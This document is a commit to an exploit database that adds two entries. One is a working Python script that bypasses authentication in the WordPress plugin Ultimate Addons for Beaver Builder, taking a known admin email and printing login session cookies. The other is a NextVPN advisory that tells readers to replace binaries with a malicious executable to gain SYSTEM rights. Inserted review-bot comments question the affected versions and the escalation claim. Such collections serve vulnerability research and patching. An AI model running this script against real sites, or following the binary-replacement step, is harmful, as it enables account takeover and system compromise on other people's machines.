DB: 2020-01-01

2 changes to exploits/shellcodes

NextVPN v4.10 - Insecure File Permissions

Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
Offensive Security 2020-01-01 05:01:57 +00:00
parent cd36764b57
commit e976278a3f
3 changed files with 146 additions and 0 deletions

76
exploits/php/webapps/47832.py Executable file

@ -0,0 +1,76 @@
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''
Requirements:
* Valid Admin/User Email Needs to be Known
* Social Media Login Form has to be Embedded in the Specified URL
'''
#!/usr/bin/python3
import requests
import urllib.parse
import json
import argparse
banner = r''' ____ ___ _____ _______________________________ .__ .__ __
| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/ \/|__|
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''
class exploit(object):
def __init__(self, page, email):
self.page = page
self.sess = requests.Session()
self.email = email
self.nonce = False
def get_nonce(self):
try:
nonce_req = self.sess.get(self.page)
if nonce_req.text.find("data-nonce=") != -1:
self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
except Exception as e:
print("Nonce Error: {}".format(e))
def auth_bypass(self):
try:
schema = urllib.parse.urlparse(self.page)
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
"action" : "uabb-lf-google-submit",
"name" : "raphaelrocks",
"email" : self.email,
"nonce" : self.nonce
})
if resp.status_code == 200:
print("Exploit Successful, Use the Cookies to Login: \n{}".format(
json.dumps(self.sess.cookies.get_dict(), indent=4)
))
except Exception as e:
print("Auth Bypass Error: {}".format(e))
def begin_exploit(self):
self.get_nonce()
if self.nonce:
print("Found Nonce: {}".format(self.nonce))
self.auth_bypass()
else:
print("Failed to Gather Nonce")
if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
args = parser.parse_args()
ex = exploit(args.url, args.email)
ex.begin_exploit()
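Review bot: The header is ambiguous about which releases are affected: the `# Exploit Title:` line names 1.2.4.1 as the vulnerable version, while the `# Version:` line and the banner both say `< 1.2.4.1`, which would make 1.2.4.1 the fixed release. Anyone triaging their own site needs that settled, so I would align the title with the version line and add a remediation line such as `# Fix: update Ultimate Addons for Beaver Builder to 1.2.4.1 or later`, assuming the `<` form is the correct one. The only request sent to `admin-ajax.php` carries `action=uabb-lf-google-submit`, so a header comment naming that action as the thing to look for where request bodies are logged or inspected would also help defenders. Separately, `#!/usr/bin/python3` sits below the comment header and the docstring, so it is not on line 1 and has no effect even though the file is committed as executable.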


@ -0,0 +1,68 @@
# Exploit Title: NextVPN v4.10 - Insecure File Permissions
# Date: 2019-12-23
# Exploit Author: SajjadBnd
# Contact: blackwolf@post.com
# Vendor Homepage: https://vm3max.site
# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe
# Version: 4.10
# Tested on: Win10 Professional x64
[ Description ]
The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary.
[ PoC ]
C:\Users\user\AppData\Local\NextVPN>icacls *.exe
Helper64.exe NT AUTHORITY\SYSTEM:(F)
             BUILTIN\Administrators:(F)
             DESKTOP-5V14SL6\user:(F)
 
NextVPN.exe NT AUTHORITY\SYSTEM:(F)
            BUILTIN\Administrators:(F)
            DESKTOP-5V14SL6\user:(F)
 
Proxifier.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 DESKTOP-5V14SL6\user:(F)
 
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
Successfully processed 5 files; Failed processing 0 files
and other Directories :
>cd openconnect
openconnect.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
 
>cd st
 
st.exe NT AUTHORITY\SYSTEM:(F)
       BUILTIN\Administrators:(F)
       DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
>cd update
update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
[ Exploit -Privilege Escalation ]
ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
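Review bot: The privilege-escalation claim is not supported by the evidence shown. Every `icacls` listing is taken under `C:\Users\user\AppData\Local\NextVPN`, a per-user profile directory where full control for that user is the normal default, and the text never names the service or shows that any of these binaries is started as SYSTEM or by an administrator. The description says "It was possible to replace the service binary", so the advisory should include the service's configured binary path and logon account to tie the weak ACLs to an elevated process. The file also omits any mitigation; a line such as `[ Mitigation ] Install service binaries in a directory writable only by Administrators and SYSTEM, and remove the user's (F) entry on them` would cover it.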
 


@ -10854,6 +10854,7 @@ id,file,description,date,author,type,platform,port
47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
@ -42136,3 +42137,4 @@ id,file,description,date,author,type,platform,port
47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,
